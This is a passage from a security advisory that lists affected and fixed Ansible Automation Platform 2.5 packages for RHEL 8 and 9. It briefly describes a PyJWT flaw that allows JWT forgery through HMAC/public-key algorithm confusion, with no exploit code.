| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — | ||
